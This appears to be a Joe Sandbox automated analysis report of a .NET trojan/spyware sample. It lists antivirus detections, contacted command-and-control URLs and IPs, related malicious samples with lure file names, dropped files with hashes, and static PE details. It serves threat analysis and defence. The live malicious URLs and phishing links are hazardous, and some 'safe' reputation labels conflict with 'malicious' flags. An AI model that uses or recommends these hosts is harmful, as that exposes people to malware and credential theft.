9.0.ZciowjM9hN.exe.400000.6.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
9.0.ZciowjM9hN.exe.400000.14.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
9.0.ZciowjM9hN.exe.400000.10.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
9.0.ZciowjM9hN.exe.400000.4.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
9.0.ZciowjM9hN.exe.400000.12.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
9.0.ZciowjM9hN.exe.400000.8.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
9.2.ZciowjM9hN.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File

Domains

Source	Detection	Scanner	Label	Link
vmopahtqdf84hfvsqepalcbcch63gdyvah.ml	17%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
http://kbfvzoboss.bid/alien/fre.php	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://alphastand.top/alien/fre.php	0%	URL Reputation	safe
http://www.ibsensoftware.com/	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://alphastand.win/alien/fre.php	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://alphastand.trade/alien/fre.php	0%	URL Reputation	safe
http://vmopahtqdf84hfvsqepalcbcch63gdyvah.ml/BN2/fre.phpv	100%	Avira URL Cloud	phishing
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://vmopahtqdf84hfvsqepalcbcch63gdyvah.ml/BN2/fre.php	19%	Virustotal		Browse
http://vmopahtqdf84hfvsqepalcbcch63gdyvah.ml/BN2/fre.php	100%	Avira URL Cloud	phishing
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
vmopahtqdf84hfvsqepalcbcch63gdyvah.ml	188.114.96.7	true	true	17%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://kbfvzoboss.bid/alien/fre.php	true	URL Reputation: safe	unknown
http://alphastand.top/alien/fre.php	true	URL Reputation: safe	unknown
http://alphastand.win/alien/fre.php	true	URL Reputation: safe	unknown
http://alphastand.trade/alien/fre.php	true	URL Reputation: safe	unknown
http://vmopahtqdf84hfvsqepalcbcch63gdyvah.ml/BN2/fre.php	true	19%, Virustotal, Browse Avira URL Cloud: phishing	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.apache.org/licenses/LICENSE-2.0	ZciowjM9hN.exe, 00000000.00000002.323134179.0000000006C82000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.com	ZciowjM9hN.exe, 00000000.00000002.323134179.0000000006C82000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.com/designersG	ZciowjM9hN.exe, 00000000.00000002.323134179.0000000006C82000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.com/designers/?	ZciowjM9hN.exe, 00000000.00000002.323134179.0000000006C82000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.founder.com.cn/cn/bThe	ZciowjM9hN.exe, 00000000.00000002.323134179.0000000006C82000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers?	ZciowjM9hN.exe, 00000000.00000002.323134179.0000000006C82000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.ibsensoftware.com/	ZciowjM9hN.exe, ZciowjM9hN.exe, 00000009.00000002.544621868.0000000000400000.00000040.00000400.00020000.00000000.sdmp, ZciowjM9hN.exe, 00000009.00000000.316135855.0000000000400000.00000040.00000400.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.tiro.com	ZciowjM9hN.exe, 00000000.00000002.323134179.0000000006C82000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers	ZciowjM9hN.exe, 00000000.00000002.323134179.0000000006C82000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.goodfont.co.kr	ZciowjM9hN.exe, 00000000.00000002.323134179.0000000006C82000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://vmopahtqdf84hfvsqepalcbcch63gdyvah.ml/BN2/fre.phpv	ZciowjM9hN.exe, 00000009.00000003.473720626.00000000016BC000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: phishing	unknown
http://www.carterandcone.coml	ZciowjM9hN.exe, 00000000.00000002.323134179.0000000006C82000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.sajatypeworks.com	ZciowjM9hN.exe, 00000000.00000002.323134179.0000000006C82000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.typography.netD	ZciowjM9hN.exe, 00000000.00000002.323134179.0000000006C82000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers/cabarga.htmlN	ZciowjM9hN.exe, 00000000.00000002.323134179.0000000006C82000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.founder.com.cn/cn/cThe	ZciowjM9hN.exe, 00000000.00000002.323134179.0000000006C82000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.galapagosdesign.com/staff/dennis.htm	ZciowjM9hN.exe, 00000000.00000002.323134179.0000000006C82000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://fontfabrik.com	ZciowjM9hN.exe, 00000000.00000002.323134179.0000000006C82000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.founder.com.cn/cn	ZciowjM9hN.exe, 00000000.00000002.323134179.0000000006C82000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers/frere-jones.html	ZciowjM9hN.exe, 00000000.00000002.323134179.0000000006C82000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.jiyu-kobo.co.jp/	ZciowjM9hN.exe, 00000000.00000002.323134179.0000000006C82000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.galapagosdesign.com/DPlease	ZciowjM9hN.exe, 00000000.00000002.323134179.0000000006C82000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers8	ZciowjM9hN.exe, 00000000.00000002.323134179.0000000006C82000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fonts.com	ZciowjM9hN.exe, 00000000.00000002.323134179.0000000006C82000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.sandoll.co.kr	ZciowjM9hN.exe, 00000000.00000002.323134179.0000000006C82000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.urwpp.deDPlease	ZciowjM9hN.exe, 00000000.00000002.323134179.0000000006C82000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.zhongyicts.com.cn	ZciowjM9hN.exe, 00000000.00000002.323134179.0000000006C82000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.sakkal.com	ZciowjM9hN.exe, 00000000.00000002.323134179.0000000006C82000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
188.114.97.7	unknown	European Union	13335	CLOUDFLARENETUS	true
188.114.96.7	vmopahtqdf84hfvsqepalcbcch63gdyvah.ml	European Union	13335	CLOUDFLARENETUS	true
188.114.97.6	unknown	European Union	13335	CLOUDFLARENETUS	true

Private

IP
192.168.2.1

General Information

Joe Sandbox Version:	35.0.0 Citrine
Analysis ID:	642374
Start date and time: 09/06/202212:17:07	2022-06-09 12:17:07 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 9m 53s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	ZciowjM9hN (renamed file extension from none to exe)
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	26
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@3/3@49/4
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 8.6% (good quality ratio 8.2%) Quality average: 76.5% Quality standard deviation: 29%
HCA Information:	Successful, ratio: 100% Number of executed functions: 48 Number of non-executed functions: 6
Cookbook Comments:	Adjust boot time Enable AMSI

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe
Excluded domains from analysis (whitelisted): www.bing.com, ris.api.iris.microsoft.com, fs.microsoft.com, store-images.s-microsoft.com, login.live.com, sls.update.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
12:18:32	API Interceptor	47x Sleep call for process: ZciowjM9hN.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
188.114.97.7	OFFER NO.80313-77683.exe	Get hash	malicious	Browse	www.ig-representative.com/dx3n/?2dit=hw1qijasabB71NoAgjN3r7xU0uprvGrwI7KwKvh82FKmH6umw1C0SEhav2EbKi6+YZvu&y44Tzf=0lpXKrapVr
	3qZWQxIBZx.exe	Get hash	malicious	Browse	vmopahtqdf84hfvsqepalcbcch63gdyvah.ml/BN2/fre.php
	EURO TT.xlsx	Get hash	malicious	Browse	vmopahtqdf84hfvsqepalcbcch63gdyvah.ml/BN2/fre.php
	Shipping Invoice.exe	Get hash	malicious	Browse	www.followpanelbd.com/pdrq/?f2MHUb=KNeuCC499j/x2g9QdgJzCNxmPBwyX+cEAKDHlg1Xtj52v5fST+hqMD2h1wBlulf+OmuQ&pDH0=FTbd06C
	FRLjUAnBL1.exe	Get hash	malicious	Browse	chykosky.xyz/five/fre.php
	DHL-09-2022.pdf..exe	Get hash	malicious	Browse	ttloki.us/xz/ee/ttf.php
	MT103_Ref001293838 Confirmation transfer Copy.exe	Get hash	malicious	Browse	www.jpremium.net/arna/?bp8Xmvl=uiiPXzKQr7Vm6k60PGb34j17bZlQN823tECE0jea72Fg1qqHk2IpQS31kiz/RzmIBpEL&TbWh4D=6lCp0RRxPT4LJ
	vMgPU13uiz.exe	Get hash	malicious	Browse	www.fieldingsoundworks.com/s2q8/?3fX4bds8=Q/Ke9U6AjEBnYqIqQgKup97JYcoOkFYe7V4i77GkG/wgrdSZqe0ThOW9i/YQU63mXySUjUT1YA==&v0=oR-DaP
	http://aanqylta.com	Get hash	malicious	Browse	aanqylta.com/favicon.ico
	http://buyonlinemart.us/JFiCn7ihxM5MN4rEoMxkASqPtcLNcyGkSdVdCqrHauC_e5VltA	Get hash	malicious	Browse	buyonlinemart.us/JFiCn7ihxM5MN4rEoMxkASqPtcLNcyGkSdVdCqrHauC_e5VltA
	77PiNCvgJE.exe	Get hash	malicious	Browse	arabdocx.xyz/doc/five/fre.php
	7WYSdVxodI.exe	Get hash	malicious	Browse	www.99000222.com/eido/?iT=xfV1ZM4eEeL+PQpajiMrx2iVjHANJ3SsBqA/lmrqNezFSfQa9IOJU9kphYVtarRM/tpA&GrZ4_=HFNTnX90nfH
	PI160256.exe	Get hash	malicious	Browse	www.kfovideo.xyz/3e9r/?i0DxMX=lZSlt&4h=eYNn8djn4y9LcvITTGnK+7Qxceu2NlYkRUvHR5Y2R+fgJ100OAptwyUALT73GGN4lmuk
	PO DI03526.xlsx	Get hash	malicious	Browse	www.light4autism.com/grh2/?1be=0w8BPz5Qs3vVNEWp5v3QZ4JUpcDnbW5R4zIjO3d+cMD2Yy9eRDRvj4vF91Fn9fiOa2Du6Q==&g488G=-ZnHMfdXdJhDBfs
	New Order PO-REF67340982.xlsx	Get hash	malicious	Browse	neduxky.xyz/nedu/ned/five/fre.php
	EAyD0PL1Bp.exe	Get hash	malicious	Browse	vmopahtqdf84hfvsqepalcbcch63gdyvah.ml/BN2/fre.php
	pre-notification.xlsx	Get hash	malicious	Browse	vmopahtqdf84hfvsqepalcbcch63gdyvah.ml/BN2/fre.php
	SOA.exe	Get hash	malicious	Browse	www.kfovideo.xyz/3e9r/?Y0D=eYNn8djn4y9LcvITTGnK+7Qxceu2NlYkRUvHR5Y2R+fgJ100OAptwyUALT7dZ294hkmk&0v3t=5jiPcfh8UraHZBn
	vbc.exe	Get hash	malicious	Browse	vmopahtqdf84hfvsqepalcbcch63gdyvah.ml/BN2/fre.php
	PURCHASE ORDER PO5540023.xlsx	Get hash	malicious	Browse	www.samedaycash.loan/r87g/?p0D=4ymx0C3WYAiLLWLW4pPncCjuwF/fdILWNYb9E/pxqWYi3q7GjupCBOwTCoWScLqnXYaD4Q==&ep1l6=9rOXuZtp

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
vmopahtqdf84hfvsqepalcbcch63gdyvah.ml	3qZWQxIBZx.exe	Get hash	malicious	Browse	188.114.97.7
	EURO TT.xlsx	Get hash	malicious	Browse	188.114.96.7
	102.xlsx	Get hash	malicious	Browse	188.114.96.10
	KlkvACIQX9.exe	Get hash	malicious	Browse	188.114.96.10
	inward remittance.xlsx	Get hash	malicious	Browse	188.114.96.10
	xijREvMlOW.exe	Get hash	malicious	Browse	188.114.97.20
	proof of payment.xlsx	Get hash	malicious	Browse	188.114.97.10
	7KJG9mtgsK.exe	Get hash	malicious	Browse	188.114.96.10
	F8v1zSYyNE.exe	Get hash	malicious	Browse	188.114.97.10
	Due Payments.xlsx	Get hash	malicious	Browse	188.114.96.10
	Due Payments.xlsx	Get hash	malicious	Browse	188.114.96.10
	200.xlsx	Get hash	malicious	Browse	188.114.97.10
	ryXm1NUc26.exe	Get hash	malicious	Browse	188.114.97.10
	xbgyAUmAXn.exe	Get hash	malicious	Browse	188.114.97.10
	vbc.exe	Get hash	malicious	Browse	188.114.96.20
	Bank Details.xlsx	Get hash	malicious	Browse	188.114.97.10
	payment advice.xlsx	Get hash	malicious	Browse	188.114.97.10
	nPQlB10mz4.exe	Get hash	malicious	Browse	188.114.97.10
	ll3XENTidl.exe	Get hash	malicious	Browse	188.114.97.10
	YpD9EiB9vy.exe	Get hash	malicious	Browse	188.114.96.10

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
CLOUDFLARENETUS	SecuriteInfo.com.Variant.Lazy.173867.17498.exe	Get hash	malicious	Browse	188.114.96.7
	OFFER NO.80313-77683.exe	Get hash	malicious	Browse	188.114.97.7
	https://wp20.ru/r760168939/	Get hash	malicious	Browse	104.21.35.251
	OD7soiLHyg.exe	Get hash	malicious	Browse	188.114.96.7
	https://2sharedfile.z13.web.core.windows.net	Get hash	malicious	Browse	104.17.25.14
	http://xe.zpa5f.parquedosfranceses.com.br/#.aHR0cHM6Ly9vYmplY3RzdG9yYWdlLmV1LW1pbGFuLTEub3JhY2xlY2xvdWQuY29tL24vYXhhcGtsc21uYTByL2IvYnVja2V0LTIwMjIwNjA5LTAyMTIvby9zZXJ2ZXIgKDEpLmh0bWwjcmljaGFyZC5jb3J0ZXNAdG9sbGdyb3VwLmNvbQ	Get hash	malicious	Browse	104.17.25.14
	3qZWQxIBZx.exe	Get hash	malicious	Browse	188.114.96.7
	ZIRAAT SWIFT-pdf.exe	Get hash	malicious	Browse	162.159.134.233
	HALKBANK.exe	Get hash	malicious	Browse	162.159.134.233
	http://9468.karnovgroup.eajiri.com/#noreply@karnovgroup.se	Get hash	malicious	Browse	104.17.25.14
	20220906 - 00929320002.xls.exe	Get hash	malicious	Browse	162.159.134.233
	http://np.mzarx.drrenylima.com.br/%23.aHR0cHM6Ly93d3cuYWFzY2h3Lm9yZy93cC1jb250ZW50L29mZmljZWRvY3VtZW50L2x0L2JldGhhbnkubGFuZ0B2ZXJpdGFzLmNvbQ==&data=05	Get hash	malicious	Browse	104.20.90.5
	http://np.mzarx.drrenylima.com.br//#.aHR0cHM6Ly93d3cuYWFzY2h3Lm9yZy93cC1jb250ZW50L29mZmljZWRvY3VtZW50L2x0L2JldGhhbnkubGFuZ0B2ZXJpdGFzLmNvbQ==	Get hash	malicious	Browse	188.114.97.7
	https://www.googleadservices.com/pagead/aclk?sa=L&ai=Ccl-eIHR-YrPfEvSMwNYP_72lwAfR1deAaryAx4ORDdrZHhABIK7IgyBgya6IipikiBOgAbeW8OsCyAEJqQISlbM1I6pAPqgDAcgDywSqBPsBT9B2t-xsPrZio8oydlHy7n0JzaCcfMz3KC0jUhps7u_F1tZPRTOS6CJlO8Kg66k9ltz7jZEyTLnnEpHJ4cmxZ8VIo83KVBLdiQIJATlAeQnLG4q6fbl_ABTC7X2kbbAT1PtH5hW8sUR1XuEETaMw9J-UyJx57aoBZNn1sFHjq6vXn7-CbHxsZp0IHUYusfGlTilBGZE8zWYF8XjYdJlzYoEOXHNQ5eLwdCrD_LIsSM5SseThsRU30LrLXFM_eqSxRy-aUlAdhO69vSME6t0OQLhSx6wGy8gNzm8QgEPTL4vMFb7l57IWx24_zV5ny61WmVANeHKnGHR8tjPABPmT273_AqAGLoAHsemPlAGoB47OG6gHk9gbqAfulrECqAf-nrECqAeko7ECqAfVyRuoB6a-G6gH89EbqAeW2BuoB6qbsQKoB9-fsQLYBwDSCAcIiGEQARgfsQnBhXc8rYB7IIAKAZgLAcgLAYAMAbgMAbgTiCfYEwyIFAPQFQGYFgH4FgGAFwE&ae=1&num=1&cid=CAASKORocStTWYAEg7xWtSyOiaCgfm0K-VOKh6Yy72BvO_uIEk0N3YYuUjc&sig=AOD64_3XAhO4C8jevvZeHePjRnXSQfkahg&client=ca-pub-7622341867996901&nb=9&adurl=https://2007mvn2pksq1e2959adjesaiat3kedro1tjldocu4r6s2t4pvtlo18.siasky.net#c3RlZmFuLnNjaHJlaWJlckB2ZXJiaW8uZGU=	Get hash	malicious	Browse	104.18.7.145
	https://gcp.olympus.io/api/v1/share/file/download-via-public-link?linkId=946f76df-222a-4310-bc7f-72186ad3796e&responseType=file	Get hash	malicious	Browse	172.64.151.252
	DHL DRAFT BL.docx	Get hash	malicious	Browse	104.16.202.237
	DHL DRAFT BL.docx	Get hash	malicious	Browse	104.16.203.237
	EURO TT.xlsx	Get hash	malicious	Browse	188.114.96.7
	https://app.pipefy.com/public/form/b20JJaFy	Get hash	malicious	Browse	104.17.236.70
	https://app.pipefy.com/public/form/b20JJaFy	Get hash	malicious	Browse	104.17.236.70
CLOUDFLARENETUS	SecuriteInfo.com.Variant.Lazy.173867.17498.exe	Get hash	malicious	Browse	188.114.96.7
	OFFER NO.80313-77683.exe	Get hash	malicious	Browse	188.114.97.7
	https://wp20.ru/r760168939/	Get hash	malicious	Browse	104.21.35.251
	OD7soiLHyg.exe	Get hash	malicious	Browse	188.114.96.7
	https://2sharedfile.z13.web.core.windows.net	Get hash	malicious	Browse	104.17.25.14
	http://xe.zpa5f.parquedosfranceses.com.br/#.aHR0cHM6Ly9vYmplY3RzdG9yYWdlLmV1LW1pbGFuLTEub3JhY2xlY2xvdWQuY29tL24vYXhhcGtsc21uYTByL2IvYnVja2V0LTIwMjIwNjA5LTAyMTIvby9zZXJ2ZXIgKDEpLmh0bWwjcmljaGFyZC5jb3J0ZXNAdG9sbGdyb3VwLmNvbQ	Get hash	malicious	Browse	104.17.25.14
	3qZWQxIBZx.exe	Get hash	malicious	Browse	188.114.96.7
	ZIRAAT SWIFT-pdf.exe	Get hash	malicious	Browse	162.159.134.233
	HALKBANK.exe	Get hash	malicious	Browse	162.159.134.233
	http://9468.karnovgroup.eajiri.com/#noreply@karnovgroup.se	Get hash	malicious	Browse	104.17.25.14
	20220906 - 00929320002.xls.exe	Get hash	malicious	Browse	162.159.134.233
	http://np.mzarx.drrenylima.com.br/%23.aHR0cHM6Ly93d3cuYWFzY2h3Lm9yZy93cC1jb250ZW50L29mZmljZWRvY3VtZW50L2x0L2JldGhhbnkubGFuZ0B2ZXJpdGFzLmNvbQ==&data=05	Get hash	malicious	Browse	104.20.90.5
	http://np.mzarx.drrenylima.com.br//#.aHR0cHM6Ly93d3cuYWFzY2h3Lm9yZy93cC1jb250ZW50L29mZmljZWRvY3VtZW50L2x0L2JldGhhbnkubGFuZ0B2ZXJpdGFzLmNvbQ==	Get hash	malicious	Browse	188.114.97.7
	https://www.googleadservices.com/pagead/aclk?sa=L&ai=Ccl-eIHR-YrPfEvSMwNYP_72lwAfR1deAaryAx4ORDdrZHhABIK7IgyBgya6IipikiBOgAbeW8OsCyAEJqQISlbM1I6pAPqgDAcgDywSqBPsBT9B2t-xsPrZio8oydlHy7n0JzaCcfMz3KC0jUhps7u_F1tZPRTOS6CJlO8Kg66k9ltz7jZEyTLnnEpHJ4cmxZ8VIo83KVBLdiQIJATlAeQnLG4q6fbl_ABTC7X2kbbAT1PtH5hW8sUR1XuEETaMw9J-UyJx57aoBZNn1sFHjq6vXn7-CbHxsZp0IHUYusfGlTilBGZE8zWYF8XjYdJlzYoEOXHNQ5eLwdCrD_LIsSM5SseThsRU30LrLXFM_eqSxRy-aUlAdhO69vSME6t0OQLhSx6wGy8gNzm8QgEPTL4vMFb7l57IWx24_zV5ny61WmVANeHKnGHR8tjPABPmT273_AqAGLoAHsemPlAGoB47OG6gHk9gbqAfulrECqAf-nrECqAeko7ECqAfVyRuoB6a-G6gH89EbqAeW2BuoB6qbsQKoB9-fsQLYBwDSCAcIiGEQARgfsQnBhXc8rYB7IIAKAZgLAcgLAYAMAbgMAbgTiCfYEwyIFAPQFQGYFgH4FgGAFwE&ae=1&num=1&cid=CAASKORocStTWYAEg7xWtSyOiaCgfm0K-VOKh6Yy72BvO_uIEk0N3YYuUjc&sig=AOD64_3XAhO4C8jevvZeHePjRnXSQfkahg&client=ca-pub-7622341867996901&nb=9&adurl=https://2007mvn2pksq1e2959adjesaiat3kedro1tjldocu4r6s2t4pvtlo18.siasky.net#c3RlZmFuLnNjaHJlaWJlckB2ZXJiaW8uZGU=	Get hash	malicious	Browse	104.18.7.145
	https://gcp.olympus.io/api/v1/share/file/download-via-public-link?linkId=946f76df-222a-4310-bc7f-72186ad3796e&responseType=file	Get hash	malicious	Browse	172.64.151.252
	DHL DRAFT BL.docx	Get hash	malicious	Browse	104.16.202.237
	DHL DRAFT BL.docx	Get hash	malicious	Browse	104.16.203.237
	EURO TT.xlsx	Get hash	malicious	Browse	188.114.96.7
	https://app.pipefy.com/public/form/b20JJaFy	Get hash	malicious	Browse	104.17.236.70
	https://app.pipefy.com/public/form/b20JJaFy	Get hash	malicious	Browse	104.17.236.70

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\ZciowjM9hN.exe.log

Download File

Process:	C:\Users\user\Desktop\ZciowjM9hN.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1308
Entropy (8bit):	5.345811588615766
Encrypted:	false
SSDEEP:	24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84FsXE8:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzu
MD5:	2E016B886BDB8389D2DD0867BE55F87B
SHA1:	25D28EF2ACBB41764571E06E11BF4C05DD0E2F8B
SHA-256:	1D037CF00A8849E6866603297F85D3DABE09535E72EDD2636FB7D0F6C7DA3427
SHA-512:	C100729153954328AA2A77EECB2A3CBD03CB7E8E23D736000F890B17AAA50BA87745E30FB9E2B0D61E16DCA45694C79B4CE09B9F4475220BEB38CAEA546CFC2A
Malicious:	true
Reputation:	high, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21

C:\Users\user\AppData\Roaming\C79A3B\B52B3F.lck

Download File

Process:	C:\Users\user\Desktop\ZciowjM9hN.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Reputation:	high, very likely benign file
Preview:	1

C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3853321935-2125563209-4053062332-1002\414045e2d09286d5db2581e0d955d358_d06ed635-68f6-4e9a-955c-4899f5f57b9a

Download File

Process:	C:\Users\user\Desktop\ZciowjM9hN.exe
File Type:	data
Category:	dropped
Size (bytes):	46
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	D898504A722BFF1524134C6AB6A5EAA5
SHA1:	E0FDC90C2CA2A0219C99D2758E68C18875A3E11E
SHA-256:	878F32F76B159494F5A39F9321616C6068CDB82E88DF89BCC739BBC1EA78E1F9
SHA-512:	26A4398BFFB0C0AEF9A6EC53CD3367A2D0ABF2F70097F711BBBF1E9E32FD9F1A72121691BB6A39EEB55D596EDD527934E541B4DEFB3B1426B1D1A6429804DC61
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	..............................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.621340788440396
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.80% Win32 Executable (generic) a (10002005/4) 49.75% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Windows Screen Saver (13104/52) 0.07% Generic Win/DOS Executable (2004/3) 0.01%
File name:	ZciowjM9hN.exe
File size:	621056
MD5:	4015330da10de30bcdf2b65f7f98baeb
SHA1:	bae6c45444103bab44973983c444e7293a5d30ca
SHA256:	9838ba34c89432853bf5f65e0dd54f4f5ca540e886a18b31ab96b007dcbf05d5
SHA512:	cf40441cc6f16c265452a3f6659ae7522af4e3bae22807964153651b7f163e28f23b64945ca8bdfa8b0b751ed61bcdbeae486a00f573ebf589ad99c1dad2c994
SSDEEP:	12288:aJyx609qGBvtAxm5mBDoPc+fUwET5GqhzVQdhF3iLWUlnK:Myx6018UcAHQGqhzadhZuWUl
TLSH:	A9D4C090B3BA9F71F27963F26420A00817F4391E95E4D13A9ECDB0CE62A1F4259F1E57
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......b..............0..L...,......Bj... ........@.. ....................................@................................

File Icon


Icon Hash:	cc01ecc4b6e400c4

Static PE Info

General

Entrypoint:	0x496a42
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x629EB484 [Tue Jun 7 02:14:28 2022 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
